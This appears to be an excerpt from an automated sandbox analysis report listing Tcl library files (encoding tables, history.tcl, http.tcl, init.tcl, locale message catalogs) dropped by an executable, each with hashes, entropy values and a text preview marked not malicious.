                                                                                                                                                                                                                                                    SSDEEP:24:ZlTUmJvRju3ShVbsZiAMiZyb7PNHmED43U/TW5dF:PgmOEVIwAMiw/PJ43UKF
                                                                                                                                                                                                                                                    MD5:7273E998972C9EFB2CEB2D5CD553DE49
                                                                                                                                                                                                                                                    SHA1:4AA47E6DF964366FA3C29A0313C0DAE0FA63A78F
                                                                                                                                                                                                                                                    SHA-256:330517F72738834ECBF4B6FA579F725B4B33AD9F4669975E727B40DF185751FF
                                                                                                                                                                                                                                                    SHA-512:56BF15C123083D3F04FE0C506EE8ECE4C08C17754F0CAAD3566F1469728CFD2F0A487023DCB26432240EB09F064944D3EF08175979F5D1D2BF734E7C7C609055
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: tis-620, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F.0E400E410E420E430E440E450E460E470E480E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\history.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8965
                                                                                                                                                                                                                                                    Entropy (8bit):4.797372265665968
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:D/LSKxptMOtJt+tztUtputBtKtPpkyCqXLo9f6Jy3MN6QNiLtHQYTba3QYQYxlWl:DFxptHXQ9K7u7MZnCYq
                                                                                                                                                                                                                                                    MD5:2C3BBE593E10F8B25A1AE7753AC60C3A
                                                                                                                                                                                                                                                    SHA1:4D5A635C327FA29E9DDF9E6A2A44081C8DB8AA5A
                                                                                                                                                                                                                                                    SHA-256:F136E0DB9E71468E4D9D93200CD2D04E6915D5546681BFECA6CB9A620BA648BA
                                                                                                                                                                                                                                                    SHA-512:82B83610D273FAF980FF7BEEDD5BEE5C17FFED11A5F9B146135764ED2B86D57B98D3AEC50D2C9E7C72DA7C8CBC0329A712828D2ACEC27CC6C461924942C9B859
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# history.tcl --.#.# Implementation of the history command..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The tcl::history array holds the history list and.# some additional bookkeeping variables..#.# nextid.the index used for the next history list item..# keep..the max size of the history list.# oldest.the index of the oldest item in the history...namespace eval tcl {. variable history. if {![info exists history]} {..array set history {.. nextid.0.. keep.20.. oldest.-20..}. }.}..# history --.#.#.This is the main history command. See the man page for its interface..#.This does argument checking and calls helper procedures in the.#.history namespace...proc history {args} {. set len [llength $args]. if {$len == 0} {..return [tcl::HistInfo]. }. set key [lindex $args 0]. set options "add, change, clear, event, info, keep

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\http1.0\http.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9693
                                                                                                                                                                                                                                                    Entropy (8bit):4.753694945075162
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:kQkH8VqqNg5PPx7GRpoMJesrCL2coOG0vARQVSDR6VrKj7vWQYQ7r1QvLbDPv:pVqeglpu6toO3ACUpGv
                                                                                                                                                                                                                                                    MD5:36AB75BA723A2EEE692A2C518DAAA739
                                                                                                                                                                                                                                                    SHA1:1FB133F5E012F36BFBAAFD836E9F689FB82FFAC3
                                                                                                                                                                                                                                                    SHA-256:88220B059956D3F331B29C514F0D4AD77FBD840EFB27F0C2621510800A9B9094
                                                                                                                                                                                                                                                    SHA-512:24087FCD75C51280722AE64564F28934101F99F568CB5230D91517643D43DAC16E0462DE5FC967BF8CC0CC71708D6C47B9D9986FB21964D0B1EA6016E4C10D23
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# http.tcl.# Client-side HTTP for GET, POST, and HEAD commands..# These routines can be used in untrusted code that uses the Safesock.# security policy..# These procedures use a callback interface to avoid using vwait,.# which is not defined in the safe base..#.# See the http.n man page for documentation..package provide http 1.0..array set http {. -accept */*. -proxyhost {}. -proxyport {}. -useragent {Tcl http client package 1.0}. -proxyfilter httpProxyRequired.}.proc http_config {args} {. global http. set options [lsort [array names http -*]]. set usage [join $options ", "]. if {[llength $args] == 0} {..set result {}..foreach name $options {.. lappend result $name $http($name)..}..return $result. }. regsub -all -- - $options {} options. set pat ^-([join $options |])$. if {[llength $args] == 1} {..set flag [lindex $args 0]..if {[regexp -- $pat $flag]} {.. return $http($flag)..} else {.. return -code error "Unknown option $flag, must be:

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\http1.0\pkgIndex.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):735
                                                                                                                                                                                                                                                    Entropy (8bit):4.669068874824871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:jHxxYRs+opS42wyGlTajUA43KXks4L57+HkuRz20JSv6C3l5kl:bbYRshS42wyGlTah9XkbL5i1z2jxXkl
                                                                                                                                                                                                                                                    MD5:10EC7CD64CA949099C818646B6FAE31C
                                                                                                                                                                                                                                                    SHA1:6001A58A0701DFF225E2510A4AAEE6489A537657
                                                                                                                                                                                                                                                    SHA-256:420C4B3088C9DACD21BC348011CAC61D7CB283B9BEE78AE72EED764AB094651C
                                                                                                                                                                                                                                                    SHA-512:34A0ACB689E430ED2903D8A903D531A3D734CB37733EF13C5D243CB9F59C020A3856AAD98726E10AD7F4D67619A3AF1018F6C3E53A6E073E39BD31D088EFD4AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl package index file, version 1.0.# This file is generated by the "pkg_mkIndex" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}].

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\init.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):24873
                                                                                                                                                                                                                                                    Entropy (8bit):4.82316274746826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:QOD8Ud4JkabmvmsyulMOFt/9IrOBWq8oXCQyfp125aab07:7Dn4JkGmvbh/9IrOOoXq8aV7
                                                                                                                                                                                                                                                    MD5:77A6D49BF79B449596AD9CE0E73E116B
                                                                                                                                                                                                                                                    SHA1:8CC4F2AAC6B69ED6630DF5EB610946731483F178
                                                                                                                                                                                                                                                    SHA-256:21A5AAD2ED6D69E15C032BE72DA55DCCA8B56580C869E863D87CAF2848E5C2B1
                                                                                                                                                                                                                                                    SHA-512:F4052C342D73A2492263470E06B803DDC26C3485ADAB1163F5E00115ECCF9036599AA45386B8ACF0B4B13A698DE4A6E951D9EC67CBA316F26009617899328680
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# init.tcl --.#.# Default system startup file for Tcl-based applications. Defines.# "unknown" procedure and auto-load facilities..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-1999 Scriptics Corporation..# Copyright (c) 2004 by Kevin B. Kenny. All rights reserved..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# This test intentionally written in pre-7.5 Tcl.if {[info commands package] == ""} {. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]".}.package require -exact Tcl 8.5.19..# Compute the auto path to use in this interpreter..# The values on the path come from several locations:.#.# The environment variable TCLLIBPATH.#.# tcl_library, which is the directory containing this init.tcl script..# [tclInit] (Tcl_Init()) se

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\af.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):989
                                                                                                                                                                                                                                                    Entropy (8bit):4.015702624322247
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8wcm2NkKcmtH3WhvdfjESBToOqepFHvFgdF69dixmem1OMVjeza6O6c:4azu8DtkN3bbJ75pF9gG3U2e+gc
                                                                                                                                                                                                                                                    MD5:3A3B4D3B137E7270105DC7B359A2E5C2
                                                                                                                                                                                                                                                    SHA1:2089B3948F11EF8CE4BD3D57167715ADE65875E9
                                                                                                                                                                                                                                                    SHA-256:2981965BD23A93A09EB5B4A334ACB15D00645D645C596A5ECADB88BFA0B6A908
                                                                                                                                                                                                                                                    SHA-512:044602E7228D2CB3D0A260ADFD0D3A1F7CAB7EFE5DD00C7519EAF00A395A48A46EEFDB3DE81902D420D009B137030BC98FF32AD97E9C3713F0990FE6C09887A2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \. "So"\. "Ma"\. "Di"\. "Wo"\. "Do"\. "Vr"\. "Sa"]. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \. "Sondag"\. "Maandag"\. "Dinsdag"\. "Woensdag"\. "Donderdag"\. "Vrydag"\. "Saterdag"]. ::msgcat::mcset af MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset af MONTHS_FULL [list \. "Januarie"\. "Februarie"\. "Maart"\. "April"\. "Mei"\. "Junie"\. "Julie"\. "Augustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""]. ::msgcat::mcset af AM "VM". ::msgcat::mcset af PM "NM".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\af_za.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.879621059534584
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmouFygvNLouFqF3v6aZouFy9+3vR6HK:4EnLzu8YAgvNTYF3v6axAI3voq
                                                                                                                                                                                                                                                    MD5:27C356DF1BED4B22DFA55835115BE082
                                                                                                                                                                                                                                                    SHA1:677394DF81CDBAF3D3E735F4977153BB5C81B1A6
                                                                                                                                                                                                                                                    SHA-256:3C2F5F631ED3603EF0D5BCB31C51B2353C5C27839C806A036F3B7007AF7F3DE8
                                                                                                                                                                                                                                                    SHA-512:EE88348C103382F91F684A09F594177119960F87E58C5E4FC718C698AD436E332B74B8ED18DF8563F736515A3A6442C608EBCBE6D1BD13B3E3664E1AA3851076
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y". ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ar.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1964
                                                                                                                                                                                                                                                    Entropy (8bit):4.417722751563065
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8fnkFewadQxvbkMPm/FiUoAwonC9UFsvSnvMq:46dw/L+C9cKSvF
                                                                                                                                                                                                                                                    MD5:0A88A6BFF15A6DABAAE48A78D01CFAF1
                                                                                                                                                                                                                                                    SHA1:90834BCBDA9B9317B92786EC89E20DCF1F2DBD22
                                                                                                                                                                                                                                                    SHA-256:BF984EC7CF619E700FE7E00381FF58ABE9BD2F4B3DD622EB2EDACCC5E6681050
                                                                                                                                                                                                                                                    SHA-512:85CB96321BB6FB3119D69540B9E76916F0C5F534BA01382E73F8F9A0EE67A7F1BFC39947335688F2C8F3DB9B51D969D8EA7C7104A035C0E949E8E009D4656288
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \. "\u062d"\. "\u0646"\. "\u062b"\. "\u0631"\. "\u062e"\. "\u062c"\. "\u0633"]. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar MONTHS_ABBREV [list \. "\u064a\u0646\u0627"\. "\u0641\u0628\u0631"\. "\u0645\u0627\u0631"\. "\u0623\u0628\u0631"\. "\u0645\u0627\u064a"\. "\u064a\u0648\u0646"\. "\u064a\u0648\u0644"\. "\u0623\u063a\u0633"\. "\u0633\u0628\u062a"\. "\u0623\u0643\u062a"\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ar_in.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):259
                                                                                                                                                                                                                                                    Entropy (8bit):4.825452591398057
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoKNvf/NLoKU3v6xH5oKNo+3vfXM6PYv:4EnLzu8yvf/Nq3v6vF3vfc6q
                                                                                                                                                                                                                                                    MD5:EEB42BA91CC7EF4F89A8C1831ABE7B03
                                                                                                                                                                                                                                                    SHA1:74D12B4CBCDF63FDF00E589D8A604A5C52C393EF
                                                                                                                                                                                                                                                    SHA-256:29A70EAC43B1F3AA189D8AE4D92658E07783965BAE417FB66EE5F69CFCB564F3
                                                                                                                                                                                                                                                    SHA-512:6CCB2F62986CE1CF3CE78538041A0E4AAF717496F965D73014A13E9B05093EB43185C3C14212DC052562F3F369AB6985485C8C93D1DFC60CF9B8DABEA7CDF434
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y". ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ar_jo.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1812
                                                                                                                                                                                                                                                    Entropy (8bit):4.023830561129656
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8J5Fe6k+wR+9Gb+Oa+UcP+wR+9Gb+Oa+UD:46I6CNbtdNbQ
                                                                                                                                                                                                                                                    MD5:4338BD4F064A6CDC5BFED2D90B55D4E8
                                                                                                                                                                                                                                                    SHA1:709717BB1F62A71E94D61056A70660C6A03B48AE
                                                                                                                                                                                                                                                    SHA-256:78116E7E706C7D1E3E7446094709819FB39A50C2A2302F92D6A498E06ED4A31B
                                                                                                                                                                                                                                                    SHA-512:C63A535AD19CBEF5EFC33AC5A453B1C503A59C6CE71A4CABF8083BC516DF0F3F14D3D4F309D33EDF2EC5E79DB00ED1F7D56FD21068F09F178BB2B191603BAC25
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ar_lb.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1812
                                                                                                                                                                                                                                                    Entropy (8bit):4.020656526954981
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu865Fehk+wR+9Gb+Oa+UXP+wR+9Gb+Oa+UD:46nhCNbadNbQ
                                                                                                                                                                                                                                                    MD5:3789E03CF926D4F12AFD30FC7229B78D
                                                                                                                                                                                                                                                    SHA1:AEF38AAB736E5434295C72C14F38033AAFE6EF15
                                                                                                                                                                                                                                                    SHA-256:7C970EFEB55C53758143DF42CC452A3632F805487CA69DB57E37C1F478A7571B
                                                                                                                                                                                                                                                    SHA-512:C9172600703337EDB2E36D7470A3AED96CCC763D7163067CB19E7B097BB7877522758C3109E31D5D72F486DD50BF510DDBA50EDD248B899FA0A2EEF09FCBF903
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ar_sy.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1812
                                                                                                                                                                                                                                                    Entropy (8bit):4.02203966019266
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8k5Fezk+wR+9Gb+Oa+U5P+wRa9Gb+Oa+UD:46ZzCNb0d5bQ
                                                                                                                                                                                                                                                    MD5:EC736BFD4355D842E5BE217A7183D950
                                                                                                                                                                                                                                                    SHA1:C6B83C02F5D4B14064D937AFD8C6A92BA9AE9EFB
                                                                                                                                                                                                                                                    SHA-256:AEF17B94A0DB878E2F0FB49D982057C5B663289E3A8E0E2B195DCEC37E8555B1
                                                                                                                                                                                                                                                    SHA-512:68BB7851469C24003A9D74FC7FE3599A2E95EE3803014016DDEBF4C5785F49EDBADA69CD4103F2D3B6CE91E9A32CC432DBDFEC2AED0557E5B6B13AED489A1EDA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\be.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2105
                                                                                                                                                                                                                                                    Entropy (8bit):4.215818273236158
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46dJRQPQ86AK0xQuEQS3oQsDptuCrQICZmQ8ZVDtN1QFqQLtCSjZMpktvp:hdP6HIZoFnl1Rgx
                                                                                                                                                                                                                                                    MD5:1A3ABFBC61EF757B45FF841C197BB6C3
                                                                                                                                                                                                                                                    SHA1:74D623DAB6238D05C18DDE57FC956D84974FC2D4
                                                                                                                                                                                                                                                    SHA-256:D790E54217A4BF9A7E1DCB4F3399B5861728918E93CD3F00B63F1349BDB71C57
                                                                                                                                                                                                                                                    SHA-512:154D053410AA0F7817197B7EE1E8AE839BA525C7660620581F228477B1F5B972FE95A4E493BB50365D0B63B0115036DDE54A98450CA4E8048AF5D0AF092BADE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0434"\. "\u043f\u043d"\. "\u0430\u0442"\. "\u0441\u0440"\. "\u0447\u0446"\. "\u043f\u0442"\. "\u0441\u0431"]. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\. "\u0441\u0435\u0440\u0430\u0434\u0430"\. "\u0447\u0430\u0446\u0432\u0435\u0440"\. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\. "\u0441\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset be MONTHS_ABBREV [list \. "\u0441\u0442\u0434"\. "\u043b\u044e\u0442"\. "\u0441\u043a\u0432"\. "\u043a\u0440\u0441"\. "\u043c\u0430\u0439"\. "\u0447\u0440\u0432"\. "\u043b\u043f\u043d"\. "\u0436\u043d\u

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\bg.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1819
                                                                                                                                                                                                                                                    Entropy (8bit):4.363233187157474
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46scAXuQfuQVoQAWN5EPIKfD8WQjQ3QgQaQLSqQsQGtQWCQMmt1f:hD/zQaPIKfTSiF3KVfVCqp
                                                                                                                                                                                                                                                    MD5:11FA3BA30A0EE6A7B2B9D67B439C240D
                                                                                                                                                                                                                                                    SHA1:EC5557A16A0293ABF4AA8E5FD50940B60A8A36A6
                                                                                                                                                                                                                                                    SHA-256:E737D8DC724AA3B9EC07165C13E8628C6A8AC1E80345E10DC77E1FC62A6D86F1
                                                                                                                                                                                                                                                    SHA-512:B776E7C98FB819436C61665206EE0A2644AA4952D739FF7CC58EAFBD549BD1D26028DE8E11B8533814102B31FC3884F95890971F547804BCAA4530E35BDD5CFD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
